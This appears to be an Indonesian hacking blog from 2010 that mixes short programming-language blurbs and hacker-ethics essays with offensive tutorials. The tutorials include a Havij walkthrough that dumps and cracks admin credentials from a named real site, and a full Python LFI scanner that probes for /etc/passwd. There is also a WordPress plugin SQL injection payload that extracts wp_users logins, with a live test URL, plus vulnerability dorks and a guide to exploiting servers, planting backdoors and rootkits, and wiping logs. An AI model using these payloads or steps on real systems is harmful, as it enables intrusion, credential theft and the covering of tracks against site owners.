3. Bahasa Pemrograman ASP
ASP adalah singkatan dari Active Server Pages yang merupakan salah satu bahasa pemograman web untuk menciptakan halaman web yang dinamis.
ASP merupakan salah satu produk teknologi yang disediakan oleh Microsoft.
ASP bekerja pada web server dan merupakan server side scripting.

4. Bahasa Pemrograman XML
Extensible Markup Language (XML) adalah bahasa markup serbaguna yang direkomendasikan W3C untuk mendeskripsikan berbagai macam data.
XML menggunakan markup tags seperti halnya HTML namun penggunaannya tidak terbatas pada tampilan halaman web saja.
XML merupakan suatu metode dalam membuat penanda/markup pada sebuah dokumen.

5. Bahasa Pemrograman WML
WML adalah kepanjangan dari Wireless Markup Language, yaitu bahasa pemrograman yang digunakan dalam aplikasi berbasis XML (eXtensible Markup Langauge).
WML ini adalah bahasa pemrograman yang digunakan dalam aplikasi wireless.
WML merupakan analogi dari HTML yang berjalan pada protocol nirkabel.

6. Bahasa Pemrograman PERL
Perl adalah bahasa pemrograman untuk mesin dengan sistem operasi Unix (SunOS, Linux, BSD, HP-UX), juga tersedia untuk sistem operasi seperti DOS, Windows, PowerPC, BeOS, VMS, EBCDIC, dan PocketPC.
PERL merupakan bahasa pemograman yang mirip bahasa pemograman C.

7. Bahasa Pemrograman CFM
Cfm dibuat menggunakan tag ColdFusion dengan software Adobe ColdFusion / BlueDragon / Coldfusion Studio.
Syntax coldfusion berbasis html.

8. Bahasa Pemrograman Javascript
Javascript adalah bahasa scripting yang handal yang berjalan pada sisi client.
JavaScript merupakan sebuah bahasa scripting yang dikembangkan oleh Netscape.
Untuk menjalankan script yang ditulis dengan JavaScript kita membutuhkan JavaScript-enabled browser yaitu browser yang mampu menjalankan JavaScript.

9. Bahasa Pemrograman CSS
Cascading Style Sheets (CSS) adalah suatu bahasa stylesheet yang digunakan untuk mengatur tampilan suatu dokumen yang ditulis dalam bahasa markup.
Penggunaan yang paling umum dari CSS adalah untuk memformat halaman web yang ditulis dengan HTML dan XHTML.
Walaupun demikian, bahasanya sendiri dapat dipergunakan untuk semua jenis dokumen XML termasuk SVG dan XUL.
Spesifikasi CSS diatur oleh World Wide Web Consortium (W3C).

Nah Sekian Dulu Bahan pembelajaran yang bisa saya share yang di ambil dari berbagai sumber.

Thanks : Devilzc0de , Mtn- Cyber And Indonesian Hacker Community yang udah mau saling share ilmunya :)

Spesial thanks : 5uV1m_21V yang udah coba postingkan ini sebelumnya di forum.

Cara Hack\Reset Password Admin Joomla

2010-09-12T00:22:00.000-07:00

Berikut ini adalah sekedar pencerahannya :

1. Kita tetap harus mengingat username kita, karena yang akan kita reset kali ini hanya password nya saja.

2. Login ke cPanel hosting website anda (http://namadomain-anda.xxx/cpanel)

3. Pilih Menu PhpMyAdmin (di deretan menu Databases)

4. Setelah masuk ke phpmyadmin, di menu sebelah kiri atas klik database joomla anda

5. Pilih tabel jos_users, lalu klik browse (menu pertama pada opsi aksi)

6. Setelah itu ada tampilan dengan menu : id | name | username | email | password

7. Klik icon dengan gampar pensil untuk mengedit

8. Setelah itu akan muncul tampilan dengan menu : Field | Jenis | Fungsi | Kosong | Nilai

9. LIhat opsi password, disana akan tertampilkan password yang di encrypted (acak) Misal : 2294ecd0e0f08eab7690d2a6ee69 <= silahkan ganti dengan : 5ebe2294ecd0e0f08eab7690d2a6ee69
10. Klik GO untuk menyimpan (ada dibagian kanan bawah)

11. Tunggu beberapa saat, bisa sambil merokok dulu (harus A Mild) atau menonton serial TV (harus The Highlander, jika sudah tidak ada silahkan datang ke tempat persewaan VCD/DVD terdekat

12. Setelah selesai menunggu, silahkan login ke jommla administrator anda

13. Masukan Username dan passwordnya adalah : secret

14. Jika berhasil login, jangan lupa segera ganti password sesuai dengan yang anda inginkan melalui menu ganti password, karena jika tidak saya tahu password login anda hehehe (becanda)

15. Selesai, selamat mencoba. (segala akibat yang ditimbulkan dari proses diatas adalah tanggung jawab anda sendiri, bukan tanggung jawab www.arkandas.wordpress.com)

Atau kalau mau membuat password sendiri yang unik coba ini untuk encrypt dan decrypts

Link encrypt / decrypt : http://www.hashchecker.de/

Encrypt –> mengubah text menjadi md5 hash, Decrypt –> mengubah md5hash menjadi text

contoh :

Results
Normal Text: abang hada ganteng
Md5 Hash: e2999ac9cf1a3818276aee6d5fa8ed62

coba tebak ini apa :
Md5 Hash: 1280e722a4fd92aeb455f21d89164290 —> untuk cek hash ini silakan coba disini

http://www.hashchecker.de/

Utility MD5 gratis Program md5 hash disini –>http://www.slavasoft.com/hashcalc.zip –> program ini hanya dapat mengubah nilai text menjadi md5hash (encrypt), tidak dapat sebaliknya (decrypt).

Havij Injection Tool v1.10 SQL Injector

2010-09-11T12:19:00.000-07:00

Tutor Cara memakai Havij 1.10 SQL Injector

Ini saya mengambil tips dari teman, kemarin telah posted tutor menjalankan program ini, aku cuma copy paste berhubung memang lagi malas, untuk mengulas dan bikin gambar sendiri :

Sebelum nya yang harus dipersiapkan adalah :
1. konek ke internet
2. Download program Havij 1.10 Download

Kita mulai mencoba website
contoh target kita kali ini yaitu http://www.mdsuk.org/content.php?id=8

1) Pertama jalankan program havij .........
trus masukan url target lalu klick gambar segitiga "analyze"
hasilnya kita akan mendapatkan info dari website tersebut ..

2) kedua klick tab info untuk mendapatkan informasi database na dan klick get

Havij 1.10 SQL Injector

3) Setelah mendapatkan informasi database nah ...
sekarang kita ke tab tables untuk mendapatkan tabelsnya, klick get tables dan akhirnya dapet tabelsnya, dan kelihatanlah tables adminya "tbl_admin_user"

4) Setelah itu kita akn mencari columns admin caranya centangin "tbl_admin_user" dan klick get columns dan akhirnya di dapatkan columns "tbl_admin_user"
nah sudah terpampang jelas di mata kita columns username dan password admin....

5) Centangin table username dan password dan klick get data

Akhirnya dapat sudah username dan password admin ... wah senangnya ...
Tapi tunggu dulu itu password admin masih terencrypte ...
Untung havij ini menyediakan tools descrypte md5 untuk mendescrypte password tersebut

6) klick tab yg gambar kunci warna kuning yg tulisannya md5
lalu masukin passwrd encrypte admin tersebut dan klcik start
tunggu sejenak ....dan akhirnya dapet deh password descrypte admin
Selanjut nya kita cari admin page nya ...

7) klick tab find admin trus masukin url target dan klick start ...tgu sejenak dan akhirnya di dapatkan deh admin page nya

Nah sekarang baru bisa masuk dan selanjut nya terserah anda ....

Download Tools Havij : http://www.soon2be1.com/Havij 1.10.rar

Thank's To My Family : Devilzc0de Team ^^

LFI python version by kiddies

2010-09-11T11:10:00.000-07:00

Nah Bagi yang suka dengan LFI ... hehehe
ane coba posting dari tutorial om Kiddies nih...

Langsung aja Copas Codde Di bawah Ini..

#!/usr/bin/python

#author:kiddies A.k.A penter
#email:crasher_1412[at]yahoo[dot]com
#thanks:mywisdom,gunslinger_,petimati,flyff666,devilz_nongkrong,psyc0tr0n,dewa_n cc n you!!!
#community:Devilzc0de,whitecyber,indonesianhacker,antijasakom,jasakom,darkc0de,i ntern0t,netheroes(vires)

import sys, os, time, re, urllib2, socket, httplib

if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)

proxy = "None"
count = 0

if len(sys.argv) < 2 or len(sys.argv) > 4:
print "n|---------------------------------------------------------------|"
print "| crasher_1412[@]yahoo[dot]com |"
print "| LFI scanner python version |"
print "|---------------------------------------------------------------|n"
sys.exit(1)

for arg in sys.argv:
if arg == '-h' or arg == '--help' or arg == '-help':
print "n|-------------------------------------------------------------------------------|"
print "| crasher_1412[@]yahoo[dot]com |"
print "| LFI scanner python version |"
print "| Usage: lfi.py www.site.com |"
print "| Example: lfi.py http://website.com/make.php?id= |"
print "| Proxy: lfi.py http://website.com/make.php?id= -p PROXY |"
print "| Visit devilzc0de.org |"
print "|-------------------------------------------------------------------------------|n"
sys.exit(1)
elif arg == '-p':
proxy = sys.argv[count+1]
count += 1

lfis = ["/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]

site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site[-1] != "=":
site = site + "="

print "n|---------------------------------------------------------------|"
print "| crasher_1412[@]yahoo[dot]com |"
print "| LFI scanner python version |"
print "|---------------------------------------------------------------|n"
print "n[-] %s" % time.strftime("%X")
print
print "-"*80
print "tttChecking for LFI"
print "-"*80
print "n[+] Target:",site
print "[+]",len(lfis),"LFI loaded..."
print "[+] Starting Scan...n"

try:
if proxy != "None":
print "n[+] Testing Proxy..."
pr = httplib.HTTPConnection(proxy)
pr.connect()
print "[+] Proxy:",proxy
print "[+] Building Handler"
print
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
else:
print "n[-] Proxy not given"
print
proxy_handler = ""
except(socket.timeout):
print "n[-] Proxy Timed Out"
sys.exit(1)
except(),msg:
print msg
print "n[-] Proxy Failed"
sys.exit(1)

for lfi in lfis:
print "[+] Checking:" ,site+lfi.replace("n","")
print
proxyfier = urllib2.build_opener(proxy_handler)
try:
check = proxyfier.open(site+lfi.replace("n", "")).read()
if re.findall("root:x:", check):
print "[+] w00t!,w00t!: ",lfi
print
else:
print "[-] Not Found: ",lfi
print
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt, SystemExit):
raise

Buat Om Kiddies Thanks Banget ya Tutorialnya..
Jadi Ada Bahan Buat Pembelajaran Saya Yang Masih Newbie ini ^^

WORDPRESS v1.0 SQL Injection Vulnerability

2010-09-11T10:56:00.000-07:00

Dork : inurl:"wp-content/plugins/photoracer/viewimg.php?id="

########################################################

Exploit :
http://[site]/wp-content/plugins/photoracer/viewimg.php?id={SQLI}

EXAM: http://[site]/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

PAGE LOGIN : http://[site]/wp-login.php

Testing : http://powersimages.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

Selengkapnya :

Thank's : Devilzc0de Team

Selamat Mencoba...

Tingkatan dan Kode Etik Hacker

2010-09-11T10:22:00.000-07:00

Seorang hacker juga mempunyai tingkatan-tingkatan karena ada yang memang benar-benar menjadikannya sebagai profesi dan membantu keamanan sebuah situs, tapi ada juga yang hanya ingin tahu, coba-coba, ingin terkenal, cari kartu kredit, cari uang, dll. nah inilah tingkatan mereka:

1. Elite, Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.
2. Semi Elite, Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.
3. Developed Kiddie, Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
4. Script Kiddie, Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.
5. Lamer, Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

Kode Etik Hacker

di dunia manapun kode etik sangat diperlukan, tidak terkecuali dalam dunia hacking, khususnya bagi seorang hacker. apa itu ? inilah:

1. Mampu mengakses komputer tak terbatas dan totalitas.
2. Semua informasi haruslah FREE.
3. Tidak percaya pada otoritas, artinya memperluas desentralisasi.
4. Tidak memakai identitas palsu, seperti nama samaran yang konyol, umur, posisi, dll.
5. Mampu membuat seni keindahan dalam komputer.
6. Komputer dapat mengubah hidup menjadi lebih baik.
7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.
8. Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.
9. Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.
10. Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer. Cracker tidak memiliki kode etik apapun.

Google Sebagai Mesin Pencari Yg Berbahaya

2010-09-11T09:54:00.000-07:00

Malem2 ga ada kerjaan mending gw ngepost sedikit tools yg simple

Google sebagai mesin pencari biasa juga kadang di gunakan sebagai mesin pencari yg mematikan_

Kadang google sering di salah gunakan oleh para hacker untuk tools pencari kelemahan di satu site_

Berikut contoh syntax google_

site
memfilter berdasarkan domain yang ada
contoh: site:google.co.id fox —> akan mencari kata fox di situs google.co.id

intitle
Memfilter dokumen yang memiliki title yang spesifik
contoh: intitle:fox fire —> akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire

allintitle
Memfilter dokumen untuk mencari intitle intile
contoh: allintitle:fox fire —> akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire

inurl
Memfilter pencarian dengan url yang spesifik
contoh: inurl:fox fire —> akan mencari kata fire di website yang url nya terdapat fox

allinurl
Sama dengan Allintitle (hanya ini url)

filetype, ext
Memfilter pencarian untuk dokumen yang spesifik
contoh: filetype:pdf fire —> akan mencari file PDF yang didalamnya terdapat kata fire

contoh keren: filetype:doc skripsi IT

numrange
Memfilter dokumen berdasarkan range tertentu
contoh: numrange:1-100 fire —> akan mencari range 1-100 yang terdapat kata fire

link
Memfilter site site yang memiliki link terhadap site tertentu
contoh: link:www.google.com —> akan mencari site site mana aja yang memiliki links ke google.com

inanchor
Memfilter berdasarkan site description yang ada
contoh: inanchor:fire —> akan mencari web yang memiliki deskripsi fire

Seperti Berikut Ini :

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=

Semoga postingan ini berguna bagi bahan pembelajaran kita semua.. amin.

Apa Itu Hacking

2010-09-11T07:45:00.001-07:00

Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk Teman-teman yang Sudah Ahli, ya silahkan lewat aja, tapi kalo mau dibaca juga ga apa-apa...
Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.
Pro dan Kontra Hacking
Pro Kontra
Etika Hacking Semua informasi adalah free Jika semua informasi adalah free, maka tidak ada ladi privacy
Aspek Security Intrusion adalah ilustrasi kelemahan sistem Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci
Idle Machines Hacking hanya pada idle machines idle machines milik siapa ?
science education hanya membobol tapi tidak merusak “hacker wannabe” berpotensi sangat besar untuk merusak
Okeh, sekarang waktunya melakukan aksi…
1. Fase Persiapan
~ Mengumpulkan informasi sebanyak-banyaknya
- Secara Aktif : – portscanning
- network mapping
- OS Detection
- application fingerprinting
Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat
- Secara Pasif : – mailing-list (jasakom, newbie_hacker, hackelink, dsb)
- via internet registries (informasi domain, IP Addres)
- Website yang menjadi terget
2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host -> $gcc -o exploit exploit.c
$./exploit
# hostname (# tanda mendapatkan akses root)
remote host -> $gcc -o exploit exploit.c
$./exploit -t www.terget.com
# (klo beruntung mendapatkan akes root)
~ Brute Force
- Secara berulang melakukan percobaan otentifikasi.
- Menebak username dan password.
- Cracking password file
~ Social Engineering
- Memperdayai user untuk memeberi tahu Username dan password
- Intinya ngibulin user….
3. Fase Setelah Eksekusi
~ Menginstall backdoor, trojans, dan rootkit
~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin
~ Menyalin /etc/passwd atau /etc/shadow/passwd
Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Selanjutnya terserah anda………

Perbedaan Hacker dan Cracker

Pada postingan yang lalu saya telah mengulas sedikit tentang pengertian hacker dan cracker dengan sedikit perbedaan pada ruang lingkup kegiatannya, maka postingan kali ini akan saya beri penjesan lebih jauh tentang perbedaan keduanya.

Hacker
1.Mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs. Sebagai contoh : jika seorang hacker mencoba menguji situs Yahoo! dipastikan isi situs tersebut tak akan berantakan dan mengganggu yang lain. Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna.
2.Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja.
3. Seorang Hacker tidak pelit membagi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.

Sedangkan seorang Cracker, dia mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan.
Sebagia contoh : Virus, Pencurian Kartu Kredit, Kode Warez, Pembobolan Rekening Bank, Pencurian Password E-mail/Web Server. Bisa berdiri sendiri atau berkelompok dalam bertindak. Mempunyai situs atau cenel dalam IRC yang tersembunyi, hanya orang-orang tertentu yang bisa mengaksesnya. Mempunyai IP yang tidak bisa dilacak. Kasus yang paling sering ialah Carding yaitu Pencurian Kartu Kredit, kemudian pembobolan situs dan mengubah segala isinya menjadi berantakan. Sebagai contoh : Yahoo! pernah mengalami kejadian seperti ini sehingga tidak bisa diakses dalam waktu yang lama, kasus clickBCA.com yang paling hangat dibicarakan tahun 2001 lalu.

Akibat yang Ditimbulkan oleh Hacker dan Cracker

• Hacker : membuat teknologi internet semakin maju karena hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software, membuat gairah bekerja seorang administrator kembali hidup karena hacker membantu administrator untuk memperkuat jaringan mereka.
• Cracker : merusak dan melumpuhkan keseluruhan sistem komputer, sehingga data-data pengguna jaringan rusak, hilang, ataupun berubah.